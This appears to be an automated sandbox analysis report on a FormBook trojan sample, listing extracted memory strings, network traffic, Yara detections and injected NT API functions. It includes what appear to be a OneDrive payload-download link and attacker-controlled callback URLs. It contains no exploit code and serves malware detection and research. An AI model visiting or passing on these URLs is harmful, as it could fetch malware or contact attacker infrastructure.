            Source: findstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: findstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: findstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: findstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: findstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: findstr.exe, 00000012.00000002.3323855637.0000000003149000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: findstr.exe, 00000012.00000002.3323855637.0000000003149000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: findstr.exe, 00000012.00000002.3323855637.0000000003149000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.3323855637.000000000311D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: findstr.exe, 00000012.00000002.3323855637.000000000311D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033qk
            Source: findstr.exe, 00000012.00000002.3323855637.0000000003149000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: findstr.exe, 00000012.00000002.3323855637.0000000003149000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: findstr.exe, 00000012.00000002.3323855637.000000000311D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: findstr.exe, 00000012.00000003.2679637488.0000000007C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2134410476.0000000002781000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2468006286.0000000003353000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.0000000002421000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.00000000031B3000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3183122274.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2134410476.0000000002781000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2468006286.0000000003353000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.0000000002421000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.00000000031B3000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3183122274.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=7EE64AC18753AFFC
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2134410476.0000000002781000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000008.00000002.2316207257.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif, 00000011.00000002.2468006286.0000000003353000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 0000001A.00000002.2578972763.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif, 00000024.00000002.2703544606.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 0000002B.00000002.2833483953.0000000002421000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif, 00000033.00000002.2936101972.00000000031B3000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003A.00000002.3183122274.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif, 0000003F.00000002.3094114349.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, 4Ear91jgQ7.pif.pif.pif.pif.pif, 00000046.00000002.3251492052.0000000002B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=7EE64AC18753AFFC%2120205&authkey=
            Source: findstr.exe, 00000012.00000002.3330731863.0000000003F46000.00000004.10000000.00040000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000002.3339127333.00000000038E6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000002C.00000002.2804570500.000000002FB16000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://valerieomage.com/c7rq?oBG=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl
            Source: findstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: findstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: findstr.exe, 00000012.00000002.3330731863.000000000426A000.00000004.10000000.00040000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000002.3339127333.0000000003C0A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.kosherphonestore.com/ktbm/?oBG=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.5:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.5:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.5:49716 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.5:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49724 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49756 version: TLS 1.2

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000012.00000002.3323294079.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3320583802.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.3345359746.00000000057A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2374263297.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3323096019.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3325539754.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2388313008.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000012.00000002.3323294079.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000012.00000002.3320583802.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000001B.00000002.3345359746.00000000057A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.2374263297.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000012.00000002.3323096019.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000010.00000002.3325539754.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.2388313008.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042B593 NtClose,7_2_0042B593
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72B60 NtClose,LdrInitializeThunk,7_2_02F72B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_02F72C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_02F72DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F735C0 NtCreateMutant,LdrInitializeThunk,7_2_02F735C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F74340 NtSetContextThread,7_2_02F74340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F74650 NtSuspendThread,7_2_02F74650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72AF0 NtWriteFile,7_2_02F72AF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72AD0 NtReadFile,7_2_02F72AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72AB0 NtWaitForSingleObject,7_2_02F72AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72BF0 NtAllocateVirtualMemory,7_2_02F72BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72BE0 NtQueryValueKey,7_2_02F72BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72BA0 NtEnumerateValueKey,7_2_02F72BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72B80 NtQueryInformationFile,7_2_02F72B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72EE0 NtQueueApcThread,7_2_02F72EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72EA0 NtAdjustPrivilegesToken,7_2_02F72EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72E80 NtReadVirtualMemory,7_2_02F72E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72E30 NtWriteVirtualMemory,7_2_02F72E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72FE0 NtCreateFile,7_2_02F72FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72FB0 NtResumeThread,7_2_02F72FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72FA0 NtQuerySection,7_2_02F72FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72F90 NtProtectVirtualMemory,7_2_02F72F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72F60 NtCreateProcessEx,7_2_02F72F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72F30 NtCreateSection,7_2_02F72F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72CF0 NtOpenProcess,7_2_02F72CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72CC0 NtQueryVirtualMemory,7_2_02F72CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72CA0 NtQueryInformationToken,7_2_02F72CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72C60 NtCreateKey,7_2_02F72C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72C00 NtQueryInformationProcess,7_2_02F72C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72DD0 NtDelayExecution,7_2_02F72DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72DB0 NtEnumerateKey,7_2_02F72DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72D30 NtUnmapViewOfSection,7_2_02F72D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72D10 NtMapViewOfSection,7_2_02F72D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F72D00 NtSetInformationFile,7_2_02F72D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F73090 NtSetValueKey,7_2_02F73090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F73010 NtOpenDirectoryObject,7_2_02F73010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F739B0 NtGetContextThread,7_2_02F739B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F73D70 NtOpenThread,7_2_02F73D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F73D10 NtOpenProcessToken,7_2_02F73D10
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_0641766A0_2_0641766A
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_064176780_2_06417678
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_0647ED180_2_0647ED18
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_064758100_2_06475810
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_0647B8880_2_0647B888
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_064AB45F0_2_064AB45F
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_064A6BD80_2_064A6BD8
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_064A03A00_2_064A03A0
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_064A70180_2_064A7018
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_064A78E80_2_064A78E8
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_064A3CC90_2_064A3CC9
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_064A6CD00_2_064A6CD0
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_064A30180_2_064A3018
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_064A89C40_2_064A89C4
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_064D36C80_2_064D36C8
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_064D68580_2_064D6858
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_064D14E80_2_064D14E8
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_064D4DB00_2_064D4DB0
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeCode function: 0_2_064D00400_2_064D0040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004017BF7_2_004017BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004028207_2_00402820
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004048A47_2_004048A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042D9C37_2_0042D9C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0041019A7_2_0041019A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004101A37_2_004101A3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004012307_2_00401230
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004032807_2_00403280
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00416A837_2_00416A83
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004103C37_2_004103C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040E4437_2_0040E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00401C707_2_00401C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004024FC7_2_004024FC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004025007_2_00402500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FC02C07_2_02FC02C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FE02747_2_02FE0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_030003E67_2_030003E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F4E3F07_2_02F4E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FFA3527_2_02FFA352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_030001AA7_2_030001AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FD20007_2_02FD2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FF81CC7_2_02FF81CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FF41A27_2_02FF41A2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FC81587_2_02FC8158
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDA1187_2_02FDA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F301007_2_02F30100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5C6E07_2_02F5C6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3C7C07_2_02F3C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F407707_2_02F40770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F647507_2_02F64750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FEE4F67_2_02FEE4F6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_030005917_2_03000591
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FF24467_2_02FF2446
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FE44207_2_02FE4420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F405357_2_02F40535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3EA807_2_02F3EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FF6BD77_2_02FF6BD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FFAB407_2_02FFAB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6E8F07_2_02F6E8F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F268B87_2_02F268B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0300A9A67_2_0300A9A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F4A8407_2_02F4A840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F428407_2_02F42840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F429A07_2_02F429A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F569627_2_02F56962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FFEEDB7_2_02FFEEDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F52E907_2_02F52E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FFCE937_2_02FFCE93
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40E597_2_02F40E59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FFEE267_2_02FFEE26
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F4CFE07_2_02F4CFE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F32FC87_2_02F32FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FBEFA07_2_02FBEFA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB4F407_2_02FB4F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F60F307_2_02F60F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FE2F307_2_02FE2F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F82F287_2_02F82F28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F30CF27_2_02F30CF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FE0CB57_2_02FE0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40C007_2_02F40C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3ADE07_2_02F3ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F58DBF7_2_02F58DBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDCD1F7_2_02FDCD1F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F4AD007_2_02F4AD00
